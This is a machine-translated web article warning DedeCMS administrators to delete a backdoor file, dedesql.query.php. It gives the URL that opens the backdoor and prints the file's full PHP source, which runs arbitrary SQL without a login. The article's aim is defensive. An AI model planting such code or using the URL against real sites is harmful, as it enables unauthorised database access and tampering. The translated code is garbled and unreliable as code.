Removal of the official backdoor method: After the installation of master collection, please immediately delete the Include directory of the dedesql.query.php file, such as has been installed, it is possible that the file has been renamed to Arc.sqlquery.class.php, found and deleted. This file can be used to query the site database without login verification, and to update, delete, query data and other operations. You can also test for yourself if, as I said, the method:
http://your domain name. com/include/dedesql.query.php.php?dopost=viewinfo
Enter the above URL to open the backdoor interface.
To tell the truth, will deliberately leave the backdoor procedures, the best way is not to use. The back door was discovered, and God knows that there will be more back doors coming out of the next so-called new version. The following gate file code is as follows:
Copy CodeThe code is as follows:
Require_once (DirName (__file__). " /.. /include/common.inc.php ");
if (Emptyempty ($dopost))
{
$dopost = "";
}
if ($dopost = = "Rename")
{
if (rename (' dedesql.query.php ', ' arc.sqlquery.class.php ')) {
echo "Success!" ";
}else{
echo "Failed! ";
}
Exit ();
}
if ($dopost = = "ViewInfo")
{
if (Emptyempty ($tablename))
{
echo "does not specify a table name! ";
}
Else
{
$dsql->setquery ("SHOW CREATE TABLE". $dsql->dbname. ".". $tablename);
$dsql->execute (' Me ');
$row 2 = $dsql->getarray (' Me ', mysql_both);
$ctinfo = $row 2[1];
echo " <xmp>". Trim ($ctinfo)."</xmp> ";
}
Exit ();
}
if ($dopost = = "Index")
{
Require_once (dedeinc. ' /arc.partview.class.php ');
$envs = $_sys_globals = Array ();
$envs [' aid '] = 0;
$PV = new Partview ();
$row = $PV->dsql->getone (' Select * from ' dede_homepageset ');
$templet = Str_replace ("{style}", $cfg _df_style, $row [' Templet ']);
$homeFile = DirName (__file__). ' /'. $row [' position '];
$homeFile = Str_replace ("//", "/", str_replace ("\ \", "/", $homeFile));
$fp = fopen ($homeFile, ' w ') or Die ("Cannot update website home page to: $homeFile location");
Fclose ($FP);
$TPL = $cfg _basedir. $cfg _templets_dir. '/'. $templet;
$PV->settemplet ($TPL);
$PV->savetohtml ($homeFile);
$PV->close ();
echo "Successfully updated homepage!" ";
Exit ();
}
else if ($dopost = = "Query")
{
$sqlquery = Trim (stripslashes ($sqlquery));
if (Eregi ("drop (. *) Table", $sqlquery) | | Eregi ("Drop (. *) database", $sqlquery))
{
echo " statements that delete ' data table ' or ' database ' are not allowed to execute here. ";
Exit ();
}
if (eregi ("^select", $sqlquery))
{
$dsql->setquery ($sqlquery);
$dsql->execute ();
if ($dsql->gettotalrow () <=0)
{
echo "Run sql:{$sqlquery}, no return record!" ";
}
Else
{
echo "Run sql:{$sqlquery}, Total". $dsql->gettotalrow (). " Record, the maximum return 100 bar! ";
}
$j = 0;
while ($row = $dsql->getarray ())
{
$j + +;
if ($j >100)
{
Break
}
echo " ";
echo "Record: $j";
echo " ";
foreach ($row as $k = $v)
{
echo "{$k}:{$v}
\ r \ n ";
}
}
Exit ();
}
if ($querytype ==2)
{
$sqlquery = Str_replace ("\ R", "", $sqlquery);
$sqls = Split ("; [ \t]{0,}\n ", $sqlquery);
$nerrCode = ""; $i = 0;
foreach ($sqls as $q)
{
$q = Trim ($q);
if ($q = = "")
{
Continue
}
$dsql->executenonequery ($q);
$errCode = Trim ($dsql->geterror ());
if ($errCode = = "")
{
$i + +;
}
Else
{
$nerrCode. = "Execute: $q error, Error:". $errCode. "
";
}
}
echo "successfully executed {$i} SQL statements!
";
Echo $nerrCode;
}
Else
{
$dsql->executenonequery ($sqlquery);
$nerrCode = Trim ($dsql->geterror ());
echo "successfully executes 1 SQL statements!"
";
Echo $nerrCode;
}
Exit ();
}
if ($dopost = = "View")
{
; Echo '
<title>SQL command-line tools</title>
| SQL command Runner: |
Data Backup
| Data Restore
|
|
|
';}
?>
http://www.bkjia.com/PHPjc/322870.html www.bkjia.com true http://www.bkjia.com/PHPjc/322870.html techarticle removal of the official backdoor method: After the installation of the master collection, please immediately delete the Include directory of the dedesql.query.php file, such as has been installed, it is possible that the file has been renamed to arc.sqlquery.cl ...
